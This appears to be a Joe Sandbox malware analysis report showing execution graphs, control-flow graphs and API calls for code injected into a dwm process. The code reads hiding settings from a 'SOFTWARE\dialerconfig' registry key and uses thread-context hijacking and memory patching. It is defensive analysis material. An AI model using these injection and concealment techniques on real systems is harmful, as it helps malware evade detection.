                                                                    • Instruction ID: f9751e398ec6f9e8c393d2d9c50e353c79f978f663c39b1dde9fddacf25f1213
                                                                    • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                    • Instruction Fuzzy Hash: E2115535705B8881EF059B66A8082AAB3E1FB89FD0F1D40289E4E83776DF78C842C310

                                                                    Execution Graph

                                                                    Execution Coverage:1.7%
                                                                    Dynamic/Decrypted Code Coverage:95.2%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:126
                                                                    Total number of Limit Nodes:16
                                                                    execution_graph 15120 1d15b0528c8 15122 1d15b05290e 15120->15122 15121 1d15b052970 15122->15121 15124 1d15b053844 15122->15124 15125 1d15b053851 StrCmpNIW 15124->15125 15126 1d15b053866 15124->15126 15125->15126 15126->15122 15127 1d15b05554d 15129 1d15b055554 15127->15129 15128 1d15b0555bb 15129->15128 15130 1d15b055637 VirtualProtect 15129->15130 15131 1d15b055671 15130->15131 15132 1d15b055663 GetLastError 15130->15132 15132->15131 15133 1d15b01273c 15134 1d15b01276a 15133->15134 15135 1d15b0127c5 VirtualAlloc 15134->15135 15138 1d15b0128d4 15134->15138 15137 1d15b0127ec 15135->15137 15135->15138 15136 1d15b012858 LoadLibraryA 15136->15137 15137->15136 15137->15138 15139 1d15b055cf0 15140 1d15b055cfd 15139->15140 15141 1d15b055d09 15140->15141 15149 1d15b055e1a 15140->15149 15142 1d15b055d8d 15141->15142 15143 1d15b055d3e 15141->15143 15144 1d15b055d66 SetThreadContext 15143->15144 15144->15142 15145 1d15b055e41 VirtualProtect FlushInstructionCache 15145->15149 15146 1d15b055efe 15147 1d15b055f1e 15146->15147 15161 1d15b0543e0 15146->15161 15157 1d15b054df0 GetCurrentProcess 15147->15157 15149->15145 15149->15146 15151 1d15b055f23 15152 1d15b055f77 15151->15152 15153 1d15b055f37 ResumeThread 15151->15153 15165 1d15b057940 15152->15165 15154 1d15b055f6b 15153->15154 15154->15151 15156 1d15b055fbf 15158 1d15b054e0c 15157->15158 15159 1d15b054e22 VirtualProtect FlushInstructionCache 15158->15159 15160 1d15b054e53 15158->15160 15159->15158 15160->15151 15162 1d15b0543fc 15161->15162 15163 1d15b05445f 15162->15163 15164 1d15b054412 VirtualFree 15162->15164 15163->15147 15164->15162 15166 1d15b057949 _log10_special 15165->15166 15167 1d15b057954 15166->15167 15170 1d15b058320 15166->15170 15167->15156 15169 1d15b058157 15169->15156 15172 1d15b058331 capture_current_context 15170->15172 15171 1d15b05833a RtlLookupFunctionEntry 15171->15172 15173 1d15b058389 15171->15173 15172->15171 15172->15173 15173->15169 15174 1d15b053ab9 15179 1d15b053a06 15174->15179 15175 1d15b053a56 VirtualQuery 15177 1d15b053a70 15175->15177 15175->15179 15176 1d15b053a8a VirtualAlloc 15176->15177 15178 1d15b053abb GetLastError 15176->15178 15178->15179 15179->15175 15179->15176 15179->15177 15180 1d15b051abc 15185 1d15b051628 GetProcessHeap 15180->15185 15182 1d15b051ad2 Sleep SleepEx 15183 1d15b051acb 15182->15183 15183->15182 15184 1d15b051598 StrCmpIW StrCmpW 15183->15184 15184->15183 15186 1d15b051648 __free_lconv_mon 15185->15186 15230 1d15b051268 GetProcessHeap 15186->15230 15188 1d15b051650 15189 1d15b051268 2 API calls 15188->15189 15190 1d15b051661 15189->15190 15191 1d15b051268 2 API calls 15190->15191 15192 1d15b05166a 15191->15192 15193 1d15b051268 2 API calls 15192->15193 15194 1d15b051673 15193->15194 15195 1d15b05168e RegOpenKeyExW 15194->15195 15196 1d15b0518a6 15195->15196 15197 1d15b0516c0 RegOpenKeyExW 15195->15197 15196->15183 15198 1d15b0516ff RegOpenKeyExW 15197->15198 15199 1d15b0516e9 15197->15199 15201 1d15b051723 15198->15201 15202 1d15b05173a RegOpenKeyExW 15198->15202 15241 1d15b0512bc RegQueryInfoKeyW 15199->15241 15234 1d15b05104c RegQueryInfoKeyW 15201->15234 15205 1d15b051775 RegOpenKeyExW 15202->15205 15206 1d15b05175e 15202->15206 15207 1d15b0517b0 RegOpenKeyExW 15205->15207 15208 1d15b051799 15205->15208 15210 1d15b0512bc 13 API calls 15206->15210 15212 1d15b0517d4 15207->15212 15213 1d15b0517eb RegOpenKeyExW 15207->15213 15211 1d15b0512bc 13 API calls 15208->15211 15214 1d15b05176b RegCloseKey 15210->15214 15215 1d15b0517a6 RegCloseKey 15211->15215 15216 1d15b0512bc 13 API calls 15212->15216 15217 1d15b051826 RegOpenKeyExW 15213->15217 15218 1d15b05180f 15213->15218 15214->15205 15215->15207 15219 1d15b0517e1 RegCloseKey 15216->15219 15221 1d15b051861 RegOpenKeyExW 15217->15221 15222 1d15b05184a 15217->15222 15220 1d15b05104c 5 API calls 15218->15220 15219->15213 15225 1d15b05181c RegCloseKey 15220->15225 15223 1d15b051885 15221->15223 15224 1d15b05189c RegCloseKey 15221->15224 15226 1d15b05104c 5 API calls 15222->15226 15227 1d15b05104c 5 API calls 15223->15227 15224->15196 15225->15217 15228 1d15b051857 RegCloseKey 15226->15228 15229 1d15b051892 RegCloseKey 15227->15229 15228->15221 15229->15224 15252 1d15b066168 15230->15252 15232 1d15b051283 GetProcessHeap 15233 1d15b0512ae __free_lconv_mon 15232->15233 15233->15188 15235 1d15b0511b5 RegCloseKey 15234->15235 15236 1d15b0510bf 15234->15236 15235->15202 15236->15235 15237 1d15b0510cf RegEnumValueW 15236->15237 15239 1d15b051125 __free_lconv_mon 15237->15239 15238 1d15b05114e GetProcessHeap 15238->15239 15239->15235 15239->15237 15239->15238 15240 1d15b05116e GetProcessHeap HeapFree 15239->15240 15240->15239 15242 1d15b051327 GetProcessHeap 15241->15242 15243 1d15b05148a RegCloseKey 15241->15243 15246 1d15b05133e __free_lconv_mon 15242->15246 15243->15198 15244 1d15b051476 GetProcessHeap HeapFree 15244->15243 15245 1d15b051352 RegEnumValueW 15245->15246 15246->15244 15246->15245 15248 1d15b0513d3 GetProcessHeap 15246->15248 15249 1d15b05141e lstrlenW GetProcessHeap 15246->15249 15250 1d15b0513f3 GetProcessHeap HeapFree 15246->15250 15251 1d15b051443 StrCpyW 15246->15251 15254 1d15b05152c 15246->15254 15248->15246 15249->15246 15250->15249 15251->15246 15253 1d15b066177 15252->15253 15255 1d15b05157c 15254->15255 15258 1d15b051546 15254->15258 15255->15246 15256 1d15b051565 StrCmpW 15256->15258 15257 1d15b05155d StrCmpIW 15257->15258 15258->15255 15258->15256 15258->15257

                                                                    Executed Functions

                                                                    Function 000001D15B051628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                    • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                    • API String ID: 106492572-2879589442
                                                                    • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                    • Instruction ID: 13550ac79eb4724effb3ddf8e2546f8d2f2fb5f4888d08e0bbb9c0b89ef02f30
                                                                    • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                    • Instruction Fuzzy Hash: 6071FA36614A10B6EB109FA5F9517D923B4F7C6B88F501222DE4E47B69EF3CC455CB40
                                                                    Function 000001D15B053790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                    • String ID: wr
                                                                    • API String ID: 1092925422-2678910430
                                                                    • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                    • Instruction ID: 880b6c60eb87d0ef0cbd2e3ed8ecbe0dca2f535efe47e58d6dd0f34e2b7ec721
                                                                    • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                    • Instruction Fuzzy Hash: 46112A36704741A2FF149F91F5043EA62B4F78AB85F54462ADE8A07B94EF2DC545CB04
                                                                    Function 000001D15B055B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 59 1d15b055b30-1d15b055b57 60 1d15b055b59-1d15b055b68 59->60 61 1d15b055b6b-1d15b055b76 GetCurrentThreadId 59->61 60->61 62 1d15b055b78-1d15b055b7d 61->62 63 1d15b055b82-1d15b055b89 61->63 66 1d15b055faf-1d15b055fc6 call 1d15b057940 62->66 64 1d15b055b9b-1d15b055baf 63->64 65 1d15b055b8b-1d15b055b96 call 1d15b055960 63->65 69 1d15b055bbe-1d15b055bc4 64->69 65->66 72 1d15b055c95-1d15b055cb6 69->72 73 1d15b055bca-1d15b055bd3 69->73 77 1d15b055e1f-1d15b055e30 call 1d15b0574bf 72->77 78 1d15b055cbc-1d15b055cdc GetThreadContext 72->78 75 1d15b055bd5-1d15b055c18 call 1d15b0585c0 73->75 76 1d15b055c1a-1d15b055c8d call 1d15b054510 call 1d15b0544b0 call 1d15b054470 73->76 88 1d15b055c90 75->88 76->88 92 1d15b055e35-1d15b055e3b 77->92 81 1d15b055ce2-1d15b055d03 78->81 82 1d15b055e1a 78->82 81->82 91 1d15b055d09-1d15b055d12 81->91 82->77 88->69 94 1d15b055d92-1d15b055da3 91->94 95 1d15b055d14-1d15b055d25 91->95 96 1d15b055e41-1d15b055e98 VirtualProtect FlushInstructionCache 92->96 97 1d15b055efe-1d15b055f0e 92->97 106 1d15b055e15 94->106 107 1d15b055da5-1d15b055dc3 94->107 102 1d15b055d27-1d15b055d3c 95->102 103 1d15b055d8d 95->103 104 1d15b055e9a-1d15b055ea4 96->104 105 1d15b055ec9-1d15b055ef9 call 1d15b0578ac 96->105 100 1d15b055f1e-1d15b055f2a call 1d15b054df0 97->100 101 1d15b055f10-1d15b055f17 97->101 121 1d15b055f2f-1d15b055f35 100->121 101->100 110 1d15b055f19 call 1d15b0543e0 101->110 102->103 112 1d15b055d3e-1d15b055d88 call 1d15b053970 SetThreadContext 102->112 103->106 104->105 113 1d15b055ea6-1d15b055ec1 call 1d15b054390 104->113 105->92 107->106 108 1d15b055dc5-1d15b055e10 call 1d15b053900 call 1d15b0574dd 107->108 108->106 110->100 112->103 113->105 125 1d15b055f77-1d15b055f95 121->125 126 1d15b055f37-1d15b055f75 ResumeThread call 1d15b0578ac 121->126 128 1d15b055f97-1d15b055fa6 125->128 129 1d15b055fa9 125->129 126->121 128->129 129->66
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$Current$Context
                                                                    • String ID:
                                                                    • API String ID: 1666949209-0
                                                                    • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                                    • Instruction ID: 7f67c70ac212b12994ff942ee07b8926dee8e59bb44ae92ba10b444ee9ac5dd4
                                                                    • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                                    • Instruction Fuzzy Hash: 4ED17776205B88A6DA709B46F59439AB7B0F7C9B84F100216EACE47BA9DF3CC551CF40
                                                                    Function 000001D15B0550D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 131 1d15b0550d0-1d15b0550fc 132 1d15b0550fe-1d15b055106 131->132 133 1d15b05510d-1d15b055116 131->133 132->133 134 1d15b055118-1d15b055120 133->134 135 1d15b055127-1d15b055130 133->135 134->135 136 1d15b055132-1d15b05513a 135->136 137 1d15b055141-1d15b05514a 135->137 136->137 138 1d15b055156-1d15b055161 GetCurrentThreadId 137->138 139 1d15b05514c-1d15b055151 137->139 141 1d15b055163-1d15b055168 138->141 142 1d15b05516d-1d15b055174 138->142 140 1d15b0556d3-1d15b0556da 139->140 141->140 143 1d15b055176-1d15b05517c 142->143 144 1d15b055181-1d15b05518a 142->144 143->140 145 1d15b055196-1d15b0551a2 144->145 146 1d15b05518c-1d15b055191 144->146 147 1d15b0551a4-1d15b0551c9 145->147 148 1d15b0551ce-1d15b055225 call 1d15b0556e0 * 2 145->148 146->140 147->140 153 1d15b055227-1d15b05522e 148->153 154 1d15b05523a-1d15b055243 148->154 155 1d15b055236 153->155 156 1d15b055230 153->156 157 1d15b055255-1d15b05525e 154->157 158 1d15b055245-1d15b055252 154->158 155->154 160 1d15b0552a6-1d15b0552aa 155->160 159 1d15b0552b0-1d15b0552b6 156->159 161 1d15b055273-1d15b055298 call 1d15b057870 157->161 162 1d15b055260-1d15b055270 157->162 158->157 163 1d15b0552e5-1d15b0552eb 159->163 164 1d15b0552b8-1d15b0552d4 call 1d15b054390 159->164 160->159 171 1d15b05529e 161->171 172 1d15b05532d-1d15b055342 call 1d15b053cc0 161->172 162->161 168 1d15b055315-1d15b055328 163->168 169 1d15b0552ed-1d15b05530c call 1d15b0578ac 163->169 164->163 174 1d15b0552d6-1d15b0552de 164->174 168->140 169->168 171->160 178 1d15b055351-1d15b05535a 172->178 179 1d15b055344-1d15b05534c 172->179 174->163 180 1d15b05536c-1d15b0553ba call 1d15b058c60 178->180 181 1d15b05535c-1d15b055369 178->181 179->160 184 1d15b0553c2-1d15b0553ca 180->184 181->180 185 1d15b0554d7-1d15b0554df 184->185 186 1d15b0553d0-1d15b0554bb call 1d15b057440 184->186 188 1d15b0554e1-1d15b0554f4 call 1d15b054590 185->188 189 1d15b055523-1d15b05552b 185->189 197 1d15b0554bd 186->197 198 1d15b0554bf-1d15b0554ce call 1d15b054060 186->198 200 1d15b0554f6 188->200 201 1d15b0554f8-1d15b055521 188->201 190 1d15b055537-1d15b055546 189->190 191 1d15b05552d-1d15b055535 189->191 195 1d15b055548 190->195 196 1d15b05554f 190->196 191->190 194 1d15b055554-1d15b055561 191->194 203 1d15b055564-1d15b0555b9 call 1d15b0585c0 194->203 204 1d15b055563 194->204 195->196 196->194 197->185 207 1d15b0554d2 198->207 208 1d15b0554d0 198->208 200->189 201->185 210 1d15b0555c8-1d15b055661 call 1d15b054510 call 1d15b054470 VirtualProtect 203->210 211 1d15b0555bb-1d15b0555c3 203->211 204->203 207->184 208->185 216 1d15b055671-1d15b0556d1 210->216 217 1d15b055663-1d15b055668 GetLastError 210->217 216->140 217->216
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread
                                                                    • String ID:
                                                                    • API String ID: 2882836952-0
                                                                    • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                                    • Instruction ID: 814b77f5beb435c6111204c18b1e3a4860eb85996b284ed82dffff6edcea16b7
                                                                    • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                                    • Instruction Fuzzy Hash: 2B02A736219B84A6EB60CB95F59439AB7B1F3C6794F104116EA8E87FA8DB7CD444CF00
                                                                    Function 000001D15B0539E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$AllocQuery
                                                                    • String ID:
                                                                    • API String ID: 31662377-0
                                                                    • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                    • Instruction ID: ced44ef17f0db0bb718ac059701f314b0347c0d2a53f6dbc804350dc0ff2bc41
                                                                    • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                    • Instruction Fuzzy Hash: 6E31FD32219A84B1EA309A95F15539AA6B4F3CA784F100666A5CE46FE8DF7CC5808F44
                                                                    Function 000001D15B05328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                    • String ID:
                                                                    • API String ID: 1683269324-0
                                                                    • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                    • Instruction ID: 50dc774867e8dfa9d8c37b66f0b4b16705396407e2ef4eaaa7b484beffb59f76
                                                                    • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                    • Instruction Fuzzy Hash: 66118471A14641B2FB609BE1FB057EA62B4BBD7344F604327A947429E1EF7CC448CE50
                                                                    Function 000001D15B054DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 3733156554-0
                                                                    • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                                    • Instruction ID: 0faaa23e0f904dfa1ddc0926a435f5f889b881ff10e9e97893eb0f9948e1e464
                                                                    • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                                    • Instruction Fuzzy Hash: 49F0F436218A04A0D6609B81F58139EABB0F3C9BD4F140212AA8E03BA9CA3CC6808F40
                                                                    Function 000001D15B01273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 265 1d15b01273c-1d15b0127a4 call 1d15b0129d4 * 4 274 1d15b0129b2 265->274 275 1d15b0127aa-1d15b0127ad 265->275 276 1d15b0129b4-1d15b0129d0 274->276 275->274 277 1d15b0127b3-1d15b0127b6 275->277 277->274 278 1d15b0127bc-1d15b0127bf 277->278 278->274 279 1d15b0127c5-1d15b0127e6 VirtualAlloc 278->279 279->274 280 1d15b0127ec-1d15b01280c 279->280 281 1d15b012838-1d15b01283f 280->281 282 1d15b01280e-1d15b012836 280->282 283 1d15b012845-1d15b012852 281->283 284 1d15b0128df-1d15b0128e6 281->284 282->281 282->282 283->284 287 1d15b012858-1d15b01286a LoadLibraryA 283->287 285 1d15b012992-1d15b0129b0 284->285 286 1d15b0128ec-1d15b012901 284->286 285->276 286->285 288 1d15b012907 286->288 289 1d15b0128ca-1d15b0128d2 287->289 290 1d15b01286c-1d15b012878 287->290 293 1d15b01290d-1d15b012921 288->293 289->287 291 1d15b0128d4-1d15b0128d9 289->291 294 1d15b0128c5-1d15b0128c8 290->294 291->284 295 1d15b012982-1d15b01298c 293->295 296 1d15b012923-1d15b012934 293->296 294->289 297 1d15b01287a-1d15b01287d 294->297 295->285 295->293 299 1d15b012936-1d15b01293d 296->299 300 1d15b01293f-1d15b012943 296->300 301 1d15b0128a7-1d15b0128b7 297->301 302 1d15b01287f-1d15b0128a5 297->302 303 1d15b012970-1d15b012980 299->303 304 1d15b012945-1d15b01294b 300->304 305 1d15b01294d-1d15b012951 300->305 306 1d15b0128ba-1d15b0128c1 301->306 302->306 303->295 303->296 304->303 307 1d15b012963-1d15b012967 305->307 308 1d15b012953-1d15b012961 305->308 306->294 307->303 310 1d15b012969-1d15b01296c 307->310 308->303 310->303
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457136320.000001D15B010000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B010000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b010000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: AllocLibraryLoadVirtual
                                                                    • String ID:
                                                                    • API String ID: 3550616410-0
                                                                    • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                    • Instruction ID: 55679c72331ed3e7bab0be7cb74d28a35aaaa4e86c910775603edd0d527ff162
                                                                    • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                    • Instruction Fuzzy Hash: 80612932B01694A7DB58CF99EA007AD73B2F795B94F548226DE59077C4DE3CD852CB00
                                                                    Function 000001D15B051ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 000001D15B051628: GetProcessHeap.KERNEL32 ref: 000001D15B051633
                                                                      • Part of subcall function 000001D15B051628: HeapAlloc.KERNEL32 ref: 000001D15B051642
                                                                      • Part of subcall function 000001D15B051628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B0516B2
                                                                      • Part of subcall function 000001D15B051628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B0516DF
                                                                      • Part of subcall function 000001D15B051628: RegCloseKey.ADVAPI32 ref: 000001D15B0516F9
                                                                      • Part of subcall function 000001D15B051628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B051719
                                                                      • Part of subcall function 000001D15B051628: RegCloseKey.ADVAPI32 ref: 000001D15B051734
                                                                      • Part of subcall function 000001D15B051628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B051754
                                                                      • Part of subcall function 000001D15B051628: RegCloseKey.ADVAPI32 ref: 000001D15B05176F
                                                                      • Part of subcall function 000001D15B051628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B05178F
                                                                      • Part of subcall function 000001D15B051628: RegCloseKey.ADVAPI32 ref: 000001D15B0517AA
                                                                      • Part of subcall function 000001D15B051628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B0517CA
                                                                    • Sleep.KERNEL32 ref: 000001D15B051AD7
                                                                    • SleepEx.KERNELBASE ref: 000001D15B051ADD
                                                                      • Part of subcall function 000001D15B051628: RegCloseKey.ADVAPI32 ref: 000001D15B0517E5
                                                                      • Part of subcall function 000001D15B051628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B051805
                                                                      • Part of subcall function 000001D15B051628: RegCloseKey.ADVAPI32 ref: 000001D15B051820
                                                                      • Part of subcall function 000001D15B051628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B051840
                                                                      • Part of subcall function 000001D15B051628: RegCloseKey.ADVAPI32 ref: 000001D15B05185B
                                                                      • Part of subcall function 000001D15B051628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B05187B
                                                                      • Part of subcall function 000001D15B051628: RegCloseKey.ADVAPI32 ref: 000001D15B051896
                                                                      • Part of subcall function 000001D15B051628: RegCloseKey.ADVAPI32 ref: 000001D15B0518A0
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                    • String ID:
                                                                    • API String ID: 1534210851-0
                                                                    • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                    • Instruction ID: 2a2945939bc26b6d2dc204ab69198a0ad90a4bbefdeb596e6ab9371a97732843
                                                                    • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                    • Instruction Fuzzy Hash: 1C31DD75200645B2FF509BA6FB413E963B4BBC6FC0F2456239E4A87AD5FE2CC851CA11

                                                                    Non-executed Functions

                                                                    Function 000001D15B052B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 573 1d15b052b2c-1d15b052ba5 call 1d15b072ce0 576 1d15b052ee0-1d15b052f03 573->576 577 1d15b052bab-1d15b052bb1 573->577 577->576 578 1d15b052bb7-1d15b052bba 577->578 578->576 579 1d15b052bc0-1d15b052bc3 578->579 579->576 580 1d15b052bc9-1d15b052bd9 GetModuleHandleA 579->580 581 1d15b052bed 580->581 582 1d15b052bdb-1d15b052beb call 1d15b066090 580->582 584 1d15b052bf0-1d15b052c0e 581->584 582->584 584->576 587 1d15b052c14-1d15b052c33 StrCmpNIW 584->587 587->576 588 1d15b052c39-1d15b052c3d 587->588 588->576 589 1d15b052c43-1d15b052c4d 588->589 589->576 590 1d15b052c53-1d15b052c5a 589->590 590->576 591 1d15b052c60-1d15b052c73 590->591 592 1d15b052c75-1d15b052c81 591->592 593 1d15b052c83 591->593 594 1d15b052c86-1d15b052c8a 592->594 593->594 595 1d15b052c9a 594->595 596 1d15b052c8c-1d15b052c98 594->596 597 1d15b052c9d-1d15b052ca7 595->597 596->597 598 1d15b052d9d-1d15b052da1 597->598 599 1d15b052cad-1d15b052cb0 597->599 600 1d15b052da7-1d15b052daa 598->600 601 1d15b052ed2-1d15b052eda 598->601 602 1d15b052cc2-1d15b052ccc 599->602 603 1d15b052cb2-1d15b052cbf call 1d15b05199c 599->603 606 1d15b052dac-1d15b052db8 call 1d15b05199c 600->606 607 1d15b052dbb-1d15b052dc5 600->607 601->576 601->591 604 1d15b052cce-1d15b052cdb 602->604 605 1d15b052d00-1d15b052d0a 602->605 603->602 604->605 610 1d15b052cdd-1d15b052cea 604->610 611 1d15b052d3a-1d15b052d3d 605->611 612 1d15b052d0c-1d15b052d19 605->612 606->607 614 1d15b052df5-1d15b052df8 607->614 615 1d15b052dc7-1d15b052dd4 607->615 618 1d15b052ced-1d15b052cf3 610->618 620 1d15b052d3f-1d15b052d49 call 1d15b051bbc 611->620 621 1d15b052d4b-1d15b052d58 lstrlenW 611->621 612->611 619 1d15b052d1b-1d15b052d28 612->619 616 1d15b052e05-1d15b052e12 lstrlenW 614->616 617 1d15b052dfa-1d15b052e03 call 1d15b051bbc 614->617 615->614 623 1d15b052dd6-1d15b052de3 615->623 630 1d15b052e35-1d15b052e3f call 1d15b053844 616->630 631 1d15b052e14-1d15b052e1e 616->631 617->616 636 1d15b052e4a-1d15b052e55 617->636 628 1d15b052d93-1d15b052d98 618->628 629 1d15b052cf9-1d15b052cfe 618->629 632 1d15b052d2b-1d15b052d31 619->632 620->621 620->628 624 1d15b052d5a-1d15b052d64 621->624 625 1d15b052d7b-1d15b052d8d call 1d15b053844 621->625 626 1d15b052de6-1d15b052dec 623->626 624->625 634 1d15b052d66-1d15b052d79 call 1d15b05152c 624->634 625->628 639 1d15b052e42-1d15b052e44 625->639 635 1d15b052dee-1d15b052df3 626->635 626->636 628->639 629->605 629->618 630->639 631->630 640 1d15b052e20-1d15b052e33 call 1d15b05152c 631->640 632->628 641 1d15b052d33-1d15b052d38 632->641 634->625 634->628 635->614 635->626 644 1d15b052e57-1d15b052e5b 636->644 645 1d15b052ecc-1d15b052ed0 636->645 639->601 639->636 640->630 640->636 641->611 641->632 650 1d15b052e63-1d15b052e7d call 1d15b0585c0 644->650 651 1d15b052e5d-1d15b052e61 644->651 645->601 654 1d15b052e80-1d15b052e83 650->654 651->650 651->654 657 1d15b052ea6-1d15b052ea9 654->657 658 1d15b052e85-1d15b052ea3 call 1d15b0585c0 654->658 657->645 660 1d15b052eab-1d15b052ec9 